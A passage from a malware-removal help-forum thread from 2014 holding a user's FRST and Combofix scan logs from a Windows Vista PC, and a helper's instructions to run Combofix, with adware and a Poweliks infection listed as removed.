Name: Microsoft 6to4 Adapter #62
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #63
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

==================== Event log errors: =========================

Application errors:
==================
Error: (09/14/2014 09:21:32 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 12.9.2014.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Problem Reports and Solutions control panel.
Process ID: 3bec
Start Time: 01cfd02efc37ea2d
Termination Time: 0

Error: (09/14/2014 09:13:10 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - 1>Failed to compile: mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 . Error code = 0x80070003

Error: (09/14/2014 09:09:52 AM) (Source: MsiInstaller) (EventID: 11704) (User: NT AUTHORITY)
Description: Product: Microsoft .NET Framework 4.5.1 -- Error 1704. An installation for Microsoft .NET Framework 4 Client Profile is currently suspended.  You must undo the changes made by that installation to continue.  Do you want to undo those changes?

Error: (09/14/2014 09:05:43 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application iexplore.exe, version 9.0.8112.16448, time stamp 0x4549b14e, faulting module Flash32_15_0_0_152.ocx, version 15.0.0.152, time stamp 0x53fe7f17, exception code 0xc0000005, fault offset 0x00647827,
process id 0x1b9c, application start time 0xiexplore.exe0.

Error: (09/14/2014 09:03:57 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Design, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a . Error code = 0x80070020

Error: (09/14/2014 09:03:27 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Data.SqlXml, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 . Error code = 0x80070020

Error: (09/14/2014 09:01:55 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Web.RegularExpressions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a . Error code = 0x80070020

Error: (09/14/2014 09:01:51 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Design, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a . Error code = 0x80070020

Error: (09/14/2014 09:01:40 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 . Error code = 0x80070020

Error: (09/14/2014 09:01:34 AM) (Source: .NET Runtime Optimization Service) (EventID: 1101) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_32) - Failed to compile: System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a . Error code = 0x80070020

System errors:
=============
Error: (09/14/2014 08:58:20 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (09/14/2014 08:55:25 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: SASDIFSV
SASKUTIL

Error: (09/14/2014 08:49:31 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: SASDIFSV
SASKUTIL

Error: (09/14/2014 08:49:06 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 8:45:33 AM on 9/14/2014 was unexpected.

Error: (09/14/2014 07:31:20 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: KtmRm for Distributed Transaction Coordinator

Error: (09/14/2014 07:31:11 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Windows Modules Installer%%1053

Error: (09/14/2014 07:31:11 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: 30000Windows Modules Installer

Error: (09/14/2014 07:30:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Windows Modules Installer%%1053

Error: (09/14/2014 07:30:42 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: 30000Windows Modules Installer

Error: (09/14/2014 07:30:41 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1053TrustedInstaller{752073A1-23F2-4396-85F0-8FDB879ED0ED}

Microsoft Office Sessions:
=========================
Error: (03/25/2010 03:52:13 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 439 seconds with 420 seconds of active time.  This session ended with a crash.

Error: (03/25/2010 03:44:34 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 273 seconds with 240 seconds of active time.  This session ended with a crash.

Error: (03/24/2010 09:30:25 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 503 seconds with 480 seconds of active time.  This session ended with a crash.

CodeIntegrity Errors:
===================================
  Date: 2014-09-14 09:22:19.811
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.686
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.561
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.436
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.249
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:19.109
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:18.968
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:22:18.844
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:19:28.745
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-09-14 09:19:28.589
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core™ i7 CPU 950 @ 3.07GHz
Percentage of memory in use: 43%
Total physical RAM: 9206.2 MB
Available physical RAM: 5247.47 MB
Total Pagefile: 18431.2 MB
Available Pagefile: 14608.63 MB
Total Virtual: 8192 MB
Available Virtual: 8191.87 MB

==================== Drives ================================

Drive c: (HP) (Fixed) (Total:916.01 GB) (Free:657.98 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (FACTORY_IMAGE) (Fixed) (Total:15.5 GB) (Free:2.2 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 1549F232)
Partition 1: (Active) - (Size=916 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=15.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#3 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:24 PM

Posted 14 September 2014 - 01:03 PM

Hi there,

please run Combofix:


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#4 mleehogg

mleehogg
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:24 AM

Posted 15 September 2014 - 11:50 AM

Thanks for helping. Here is the Combofix logs:

 

ComboFix 14-09-14.01 - Hogg 09/15/2014   8:59.1.8 - x64
Microsoft® Windows Vista™ Home Premium   6.0.6002.2.1252.1.1033.18.9206.5865 [GMT -6:00]
Running from: c:\users\Hogg\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J5LL7X0R\ComboFix.exe
AV: Norton Internet Security *Disabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
FW: Norton Internet Security *Disabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
SP: IObit Malware Fighter *Disabled/Updated* {A751AC20-3B48-5237-898A-78C4436BB78D}
SP: Norton Internet Security *Disabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\0.bak
C:\END
C:\prefs.js
c:\program files (x86)\Search Guard Plus
c:\program files (x86)\Search Guard Plus\fbsProtection.xml
c:\program files (x86)\Search Guard Plus\fbsProtectionI.xml
c:\program files (x86)\Search Guard Plus\fbsSearchProvider.xml
c:\program files (x86)\Search Guard Plus\FbsSearchProviderIE8.exe
c:\program files (x86)\Search Guard Plus\SearchGuardPlus.ico
c:\program files (x86)\Search Guard Plus\uninstalSGP.exe
c:\program files (x86)\Search Guard PlusU
c:\program files (x86)\Search Guard PlusU\SGPU.ico
c:\program files (x86)\Search Guard PlusU\sgpUpdater.exe
c:\program files (x86)\Search Guard PlusU\sgpUpdater.xml
c:\program files (x86)\Search Guard PlusU\sgpUpdaters.exe
c:\program files (x86)\Search Guard PlusU\uninstalSGPU.exe
c:\program files (x86)\SGPSA
c:\program files (x86)\SGPSA\BHO.dll
c:\program files (x86)\SGPSA\ie3sh.exe
c:\program files (x86)\SGPSA\SearchAssistant.dll
c:\programdata\1381175560
c:\programdata\1920547364
c:\programdata\7z6ge.pad
c:\programdata\ism_0_llatsni.pad
c:\programdata\ras_0oed.pad
c:\programdata\SysWoW32
c:\programdata\SysWoW32\@u1482234626v0
c:\programdata\SysWoW32\@u1482234626v1
c:\programdata\SysWoW32\@u1482234626v2
c:\programdata\SysWoW32\@u1482234626v3
c:\programdata\SysWoW32\@u1482234626v4
c:\programdata\SysWoW32\@u1482234626v5
c:\programdata\SysWoW32\@u1482234626v6
c:\programdata\SysWoW32\@u1482234626v7
c:\programdata\SysWoW32\_u1482234626v0
c:\programdata\SysWoW32\_u1482234626v1
c:\programdata\SysWoW32\_u1482234626v2
c:\programdata\SysWoW32\_u1482234626v3
c:\programdata\SysWoW32\_u1482234626v4
c:\programdata\SysWoW32\_u1482234626v5
c:\programdata\SysWoW32\_u1482234626v6
c:\programdata\SysWoW32\_u1482234626v7
c:\programdata\SysWoW32\mu1482234626v4
c:\programdata\SysWoW32\mu1482234626v4.kwd
c:\programdata\SysWoW32\mu1482234626v5
c:\programdata\SysWoW32\mu1482234626v5.kwd
c:\programdata\SysWoW32\mu1482234626v6
c:\programdata\SysWoW32\mu1482234626v6.kwd
c:\programdata\SysWoW32\mu1482234626v7
c:\programdata\SysWoW32\mu1482234626v7.kwd
c:\programdata\SysWoW32\wu1482234626v0
c:\programdata\SysWoW32\wu1482234626v0.kwd
c:\programdata\SysWoW32\wu1482234626v1
c:\programdata\SysWoW32\wu1482234626v1.kwd
c:\programdata\SysWoW32\wu1482234626v2
c:\programdata\SysWoW32\wu1482234626v2.kwd
c:\programdata\SysWoW32\wu1482234626v3
c:\programdata\SysWoW32\wu1482234626v3.kwd
c:\programdata\uninstaller.exe
c:\programdata\unrar.exe
c:\users\Hogg\AppData\Roaming\.#
c:\users\Hogg\AppData\Roaming\82034158988C.manifest
c:\users\Hogg\AppData\Roaming\82034158988O.manifest
c:\users\Hogg\AppData\Roaming\82034158988P.manifest
c:\users\Hogg\AppData\Roaming\82034158988S.manifest
c:\users\Hogg\AppData\Roaming\inst.exe
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
    (Default)    REG_SZ    Thumbnail Cache Class Factory for Out of Proc Server
    AppID    REG_SZ    {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32
    (Default)    REG_SZ    c:\windows\system32\thumbcache.dll
    ThreadingModel    REG_SZ    Apartment
.
.
(((((((((((((((((((((((((   Files Created from 2014-08-15 to 2014-09-15  )))))))))))))))))))))))))))))))
.
.
2014-09-15 15:57 . 2014-09-15 15:57 -------- d-----w- c:\users\Hogg\AppData\Local\temp
2014-09-15 15:57 . 2014-09-15 15:57 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-09-15 15:56 . 2014-09-15 15:56 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-09-14 15:18 . 2014-09-14 15:25 -------- d-----w- C:\FRST
2014-09-14 15:10 . 2014-09-14 15:10 -------- d-----w- c:\windows\Migration
2014-09-14 15:08 . 2014-09-14 15:08 -------- d-----w- c:\programdata\WindowsSearch
2014-09-14 14:45 . 2014-09-14 14:45 -------- d-----w- C:\a400f61a0bb2614026ab8a56ec
2014-09-14 14:36 . 2014-06-26 22:17 171152 ----a-w- c:\windows\system32\infocardapi.dll
2014-09-14 14:36 . 2014-06-26 22:17 1389200 ----a-w- c:\windows\system32\icardagt.exe
2014-09-14 14:36 . 2014-06-26 22:17 99480 ----a-w- c:\windows\SysWow64\infocardapi.dll
2014-09-14 14:36 . 2014-06-26 22:17 8856 ----a-w- c:\windows\SysWow64\icardres.dll
2014-09-14 14:36 . 2014-06-26 22:17 619664 ----a-w- c:\windows\SysWow64\icardagt.exe
2014-09-14 14:36 . 2014-06-26 22:17 8848 ----a-w- c:\windows\system32\icardres.dll
2014-09-14 14:35 . 2014-06-06 04:29 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-09-14 14:35 . 2014-06-06 04:28 35480 ----a-w- c:\windows\SysWow64\TsWpfWrp.exe
2014-09-14 14:10 . 2014-09-14 14:10 -------- d-----w- c:\programdata\IObit
2014-09-14 14:09 . 2014-09-14 14:09 -------- d-----w- c:\users\Hogg\AppData\Roaming\IObit
2014-09-14 14:09 . 2014-09-14 14:09 -------- d-----w- c:\program files (x86)\IObit
2014-09-14 14:02 . 2014-09-14 14:19 -------- d-----w- c:\windows\system32\MRT
2014-09-13 17:20 . 2014-09-13 17:20 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{2193F8B5-2287-453A-BDBC-78C716D0DFF1}\offreg.dll
2014-09-13 17:00 . 2014-06-02 21:30 3137536 ----a-w- c:\windows\system32\msi.dll
2014-09-13 16:53 . 2014-08-21 17:24 11319192 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{2193F8B5-2287-453A-BDBC-78C716D0DFF1}\mpengine.dll
2014-09-13 15:00 . 2014-09-13 15:16 -------- d-----w- C:\TDSSKiller_Quarantine
2014-09-12 01:45 . 2014-09-14 14:01 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-09-12 01:45 . 2014-09-13 16:33 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-09-12 01:45 . 2014-05-12 13:26 64216 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-12 01:45 . 2014-05-12 13:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-10 15:12 . 2014-09-10 15:12 -------- d-----w- c:\program files\iPod
2014-09-10 15:12 . 2014-09-10 15:12 -------- d-----w- c:\programdata\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 15:12 . 2014-09-10 15:12 -------- d-----w- c:\program files\iTunes
2014-09-10 15:12 . 2014-09-10 15:12 -------- d-----w- c:\program files (x86)\iTunes
2014-08-29 16:04 . 2014-08-29 16:05 -------- d--h--w- c:\programdata\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-16 16:09 . 2014-09-09 02:24 -------- d-----w- c:\users\Hogg\AppData\Local\Adobe
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-12 14:08 . 2012-04-01 16:36 701104 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-09-12 14:08 . 2012-02-05 18:03 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-01 14:59 . 2010-06-24 17:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-29 19:01 . 2006-11-02 12:35 101694776 ----a-w- c:\windows\system32\mrt.exe
2014-08-25 12:53 . 2009-10-07 13:01 270496 ------w- c:\windows\system32\MpSigStub.exe
2014-08-12 05:19 . 2013-08-19 15:43 50976 ----a-w- c:\windows\system32\drivers\avgtpx64.sys
2014-07-28 20:52 . 2014-07-28 20:52 6112072 ----a-w- c:\windows\system32\usbaaplrc.dll
2014-07-28 20:52 . 2014-07-28 20:52 54784 ----a-w- c:\windows\system32\drivers\usbaapl64.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\~\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}]
2014-08-25 22:17 3627032 ----a-w- c:\program files (x86)\AVG SafeGuard toolbar\18.1.9.799\AVG SafeGuard toolbar_toolbar.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar]
"{95B7759C-8C7F-4BF1-B163-73684A933233}"= "c:\program files (x86)\AVG SafeGuard toolbar\18.1.9.799\AVG SafeGuard toolbar_toolbar.dll" [2014-08-25 3627032]
.
[HKEY_CLASSES_ROOT\clsid\{95b7759c-8c7f-4bf1-b163-73684a933233}]
[HKEY_CLASSES_ROOT\AVG SafeGuard toolbar.PugiObj.1]
[HKEY_CLASSES_ROOT\AVG SafeGuard toolbar.PugiObj]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2009-08-12 39408]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"vProt"="c:\program files (x86)\AVG SafeGuard toolbar\vprot.exe" [2014-08-25 2640408]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"TkBellExe"="c:\program files (x86)\real\realplayer\Update\realsched.exe" [2013-10-23 295512]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-09-01 152392]
"IObit Malware Fighter"="c:\program files (x86)\IObit\IObit Malware Fighter\IMF.exe" [2013-05-14 1486144]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
McAfee Security Scan Plus.lnk - c:\program files\McAfee Security Scan\3.8.141\SSScheduler.exe [2014-1-15 329944]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ    autocheck autochk *\0bootdelete
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\89540304.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro36]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro36.sys]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro36Crusader]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro36CrusaderBoot]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice]
@="Service"
.
R4 AdobeActiveFileMonitor7.0;Adobe Active File Monitor V7;c:\program files (x86)\Adobe\Photoshop Elements 7.0\PhotoshopElementsFileAgent.exe;c:\program files (x86)\Adobe\Photoshop Elements 7.0\PhotoshopElementsFileAgent.exe [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
hpdevmgmt REG_MULTI_SZ    hpqcxs08 hpqddsvc
.
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost  - NetSvcs
Themes
ezSharedSvc
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-09-13 19:46 1096520 ----a-w- c:\program files (x86)\Google\Chrome\Application\37.0.2062.120\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-15 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-01 14:08]
.
2014-09-14 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core.job
- c:\users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-05-24 23:35]
.
2014-09-14 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA.job
- c:\users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-05-24 23:35]
.
2014-09-15 c:\windows\Tasks\Foresight Software Registration3.job
- c:\windows\system32\rundll32.exe [2006-11-02 09:45]
.
2014-08-13 c:\windows\Tasks\Foresight Software Update3.job
- c:\program files (x86)\Common Files\Foresight Software\UUS3\Update3.exe [2013-06-27 21:36]
.
2014-09-15 c:\windows\Tasks\Google Software Updater.job
- c:\program files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2009-08-12 05:03]
.
2014-09-15 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2009-08-13 17:38]
.
2014-09-15 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2009-08-13 17:38]
.
2014-09-11 c:\windows\Tasks\Norton Security Scan for Hogg.job
- c:\progra~2\NORTON~2\Engine\410~1.28\Nss.exe [2014-04-15 10:30]
.
2014-09-15 c:\windows\Tasks\ParetoLogic Registration3.job
- c:\windows\system32\rundll32.exe [2006-11-02 09:45]
.
2014-09-15 c:\windows\Tasks\ParetoLogic Update Version3 Startup Task.job
- c:\program files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe [2013-05-23 21:53]
.
2014-09-13 c:\windows\Tasks\ParetoLogic Update Version3.job
- c:\program files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe [2013-05-23 21:53]
.
2014-08-29 c:\windows\Tasks\PC Helper 360.job
- c:\program files (x86)\Foresight Software\PC Helper 360\pch360.exe [2013-06-27 21:35]
.
2014-08-31 c:\windows\Tasks\PCDRScheduledMaintenance.job
- c:\program files\PC-Doctor for Windows\pcdr5cuiw32.exe [2009-02-02 18:59]
.
2014-07-04 c:\windows\Tasks\Privacy Controls_{028B732D-E038-11E2-BEAE-EE3C3BB92F93}.job
- c:\program files (x86)\ParetoLogic\Privacy Controls\Pareto_PC.exe [2013-05-23 21:53]
.
.
--------- X64 Entries -----------
.
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mStart Page = hxxp://www.google.com
mDefault_Page_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
TCP: DhcpNameServer = 209.18.47.61 209.18.47.62
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - c:\program files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-10 - (no file)
Wow6432Node-HKU-Default-Run-{C41A51F9-C162-4A86-AEA9-955929DA2DAE} - c:\users\Hogg\AppData\Local\{472011AB-211B-4DA4-8CDF-9AD275078570}\{C41A51F9-C162-4A86-AEA9-955929DA2DAE}\cgpgoheo.dll
Toolbar-10 - (no file)
WebBrowser-{5B291E6C-9A74-4034-971B-A4B007A0B315} - (no file)
WebBrowser-{B7DE27CA-0626-478A-95D6-6C0804782455} - (no file)
HKLM-Run-SmartMenu - c:\program files (x86)\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
.
.
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Services\NIS]
"ImagePath"="\"c:\program files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe\" /s \"NIS\" /m \"c:\program files (x86)\Norton Internet Security\Engine\20.5.0.28\diMaster.dll\" /prefetch:1"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Services\PCDSRVC{F36B3A4C-F95654BD-06000000}_0]
"ImagePath"="\??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_152_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_152_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_152_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
